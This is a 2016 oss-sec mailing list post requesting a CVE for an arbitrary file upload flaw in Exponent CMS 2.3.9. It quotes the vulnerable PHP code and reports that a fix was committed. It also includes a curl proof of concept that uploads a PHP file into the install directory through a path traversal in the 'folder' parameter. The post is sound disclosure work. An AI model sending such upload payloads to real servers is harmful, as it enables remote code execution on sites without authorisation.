oss-sec mailing list archives
CVE request:Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php
From: Carl Peng <felixk3y () gmail com>
Date: Wed, 21 Sep 2016 08:10:39 +0800
Hi, I reported the following Arbitrary File Upload vulnerability to the ExponentCMS team on Sep 13, 2016: vulnerability: https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592 ``` if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') && QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) { // prevent attempt to place file somewhere other than /files folder if (!empty($this->params['folder']) && strpos($this->params['folder'], '..') !== false) { $ar = new expAjaxReply(300, gt("File was not uploaded!")); $ar->send(); } if (SITE_FILE_MANAGER == 'picker') { $quikFolder = !empty($this->params['folder']) ? $this->params['folder'] :QUICK_UPLOAD_FOLDER; $destDir = null; } elseif (SITE_FILE_MANAGER == 'elfinder') { $quikFolder = null; $destDir = UPLOAD_DIRECTORY_RELATIVE . (!empty($this->params['folder']) ? $this->params['folder'] :QUICK_UPLOAD_FOLDER) . '/'; // create folder if non-existant expFile::makeDirectory($destDir); } } else { $quikFolder = null; $destDir = null; } //extensive suitability check before doing anything with the file... if (isset($_SERVER['HTTP_X_FILE_NAME'])) { //HTML5 XHR upload $file = expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'],false,false,null,$destDir,intval(QUICK_UPLOAD_WIDTH)); //here File Upload vulnerability $file->poster = $user->id; ``` the "folder" and "$_SERVER['HTTP_X_FILE_NAME']", the two parameters may be submitted by the user expFile::fileXHRUpload(): https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526 ``` $_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile; //"fileName" parameter may be submitted by the user //... $maxwidth = intval($_max_width); if (!empty($maxwidth)) { ../// } else { file_put_contents($_destFullPath, file_get_contents('php://input', 'r')); // line 572 } Proof of concept: curl -H "X-File-Name: e.php" -d "controller=file&action=quickUpload&code=<?php phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php http://www.exponentcms.org/install/e.php And Now, This vulnerability have been fixed. https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a This issue was reported by Peng Hua of silence.com.cn Inc. and I would like to request a CVE for this issue (if not done so). Thank you. ---------------------------------http://www.silence.com.cn penghua#silence.com.cn PKAV Team
Current thread:
- CVE request:Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php Carl Peng (Sep 20)